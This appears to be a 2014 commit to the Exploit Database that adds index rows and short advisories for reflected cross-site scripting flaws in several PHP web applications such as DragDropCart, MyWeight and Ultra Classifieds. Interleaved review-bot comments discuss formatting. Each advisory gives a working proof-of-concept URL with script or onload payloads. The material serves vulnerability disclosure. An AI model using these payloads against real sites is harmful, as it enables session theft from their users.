Updated 09_24_2014

Offensive Security 2014-09-24 04:44:54 +00:00
parent 20e5929d70
commit 2cc98e5da6
17 changed files with 140 additions and 0 deletions


@ -31262,3 +31262,19 @@ id,file,description,date,author,platform,type,port
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
34729,platforms/windows/dos/34729.py,"Seafile-server <= 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0
34730,platforms/php/webapps/34730.txt,"DragDropCart assets/js/ddcart.php sid Parameter XSS",2009-07-20,Moudi,php,webapps,0
34731,platforms/php/webapps/34731.txt,"DragDropCart includes/ajax/getstate.php prefix Parameter XSS",2009-07-20,Moudi,php,webapps,0
34732,platforms/php/webapps/34732.txt,"DragDropCart index.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0
34733,platforms/php/webapps/34733.txt,"DragDropCart search.php search Parameter XSS",2009-07-20,Moudi,php,webapps,0
34734,platforms/php/webapps/34734.txt,"DragDropCart login.php redirect Parameter XSS",2009-07-20,Moudi,php,webapps,0
34735,platforms/php/webapps/34735.txt,"DragDropCart productdetail.php product Parameter XSS",2009-07-20,Moudi,php,webapps,0
34736,platforms/php/webapps/34736.txt,"EZArticles 'articles.php' Cross Site Scripting Vulnerability",2009-08-20,Moudi,php,webapps,0
34737,platforms/php/webapps/34737.txt,"EZodiak \'index.php\' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 user_addfood.php date Parameter XSS",2009-07-20,Moudi,php,webapps,0
34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 user_forgot_pwd_form.php info Parameter XSS",2009-07-20,Moudi,php,webapps,0
34742,platforms/php/webapps/34742.txt,"MyWeight 1.0 user_login.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0
34743,platforms/php/webapps/34743.txt,"Proxy List Script 'index.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds listads.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0
34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds subclass.php cname Parameter XSS",2009-07-20,Moudi,php,webapps,0
34746,platforms/php/webapps/34746.txt,"Web TV 'chn' Parameter Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
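Review bot: The 34737 row escapes its quotes as `\'index.php\'` inside a double-quoted CSV field, while the neighbouring rows (34736 'articles.php', 34743 'index.php') use bare single quotes; a standard CSV parser will keep the backslashes as literal characters in the description, so they should be dropped. The 34736 row is also dated 2009-08-20 where every other Moudi entry added here is 2009-07-20, which is worth confirming against the source advisory before merging.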



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/assets/js/ddcart.php?sid=1<script>alert(649442730777)</script>
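Review bot: The body never names the affected script or parameter; the same description is reused verbatim for all six DragDropCart files in this commit, so only the example URL (here ddcart.php, sid) tells them apart. A one-line statement of the affected script and parameter under the source line, matching the files.csv title, would make the entry usable for triage without parsing the URL. No affected version is recorded either, unlike the MyWeight entries later in this commit.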


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/includes/ajax/getstate.php?country=1&prefix=1>"><ScRiPt %0A%0D>alert(712244301211)%3B</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/index.php?page=1&search=1>"><ScRiPt %0A%0D>alert(312759321896)%3B</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/search.php?search=1<script>alert(308229169208)</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/login.php?redirect=1>"><ScRiPt %0A%0D>alert(381490124289)%3B</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43478/info
DragDropCart is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/demo/productdetail.php?product=1>"><ScRiPt %0A%0D>alert(387540356725)%3B</ScRiPt>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43483/info
EZArticles is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/ezarticles/articles_1/articles.php?id=6&title=1<script>alert(309558774901)</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43485/info
EZodiak is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/ezarticles/ezodiak/index.php?sign=1>"><ScRiPt %0A%0D>alert(309408771751)%3B</ScRiPt>&date=20090717


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43486/info
GejoSoft Image Hosting Community is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/photos/tags/1<body+onload=alert(323052257059)>2009-07-20
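Review bot: The example URL ends in `>2009-07-20`, which looks like the advisory date fused onto the line rather than part of the request; it matches the date column for 34738 in files.csv. Move the date to its own line or drop it so the URL ends at the closing `>`.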


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_addfood.php?date=1>"><ScRiPt %0A%0D>alert(316624303488)%3B</ScRiPt>
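Review bot: "others versions may be affected" in the version line should read "other versions may be affected"; the same wording recurs in the other two MyWeight files added by this commit and should be fixed in all three.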


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_forgot_pwd_form.php?info=1<script>alert(394944650346)</script>

platforms/php/webapps/34742.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43488/info
MyWeight is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phplemon MyWeight 1.0 is vulnerable; others versions may be affected.
http://www.example.com/user_login.php?info=1<script>alert(311454197400)</script>
http://www.example.com/user_login.php?info=7&return=1>\"><ScRiPt+%0A%0D>alert(390214587228)%3B<%2FScRiPt>
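Review bot: The second example URL writes the quote as `\"` and encodes the rest as `ScRiPt+%0A%0D` and `<%2FScRiPt>`, where every other file in this commit uses a bare `"` and `</ScRiPt>`; the backslash looks like an escaping artefact from import, the same kind seen in the 34737 row of files.csv, and should be checked against the source advisory. The file is also added with the executable bit set although it is a plain .txt note; it should be committed as a regular file (mode 100644).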


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43489/info
Proxy List Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/proxysite/index.php?act=whois&ip=1>"><ScRiPt %0A%0D>alert(319788800356)%3B</ScRiPt>


@ -0,0 +1,9 @@
source: www.securityfocus.com/bid/43490/info
Ultra Classifieds is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ultra Classifieds Pro is vulnerable; other versions may also be affected.
http://www.example.com/ultraclassifieds/listads.php?c=69&cn=apartments&sn=1>"><ScRiPt %0A%0D>alert(317944247288)%3B</ScRiPt>
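Review bot: The source line reads `www.securityfocus.com/bid/43490/info` without the `http://` scheme that every other file in this commit carries, and the first description sentence is missing its closing period after "user-supplied input". Both points apply equally to the subclass.php file that follows.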


@ -0,0 +1,9 @@
source: www.securityfocus.com/bid/43490/info
Ultra Classifieds is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ultra Classifieds Pro is vulnerable; other versions may also be affected.
http://www.example.com/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43494/info
Web TV is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/web_tv_v3/?chn=1<script>alert(308238444762)</script>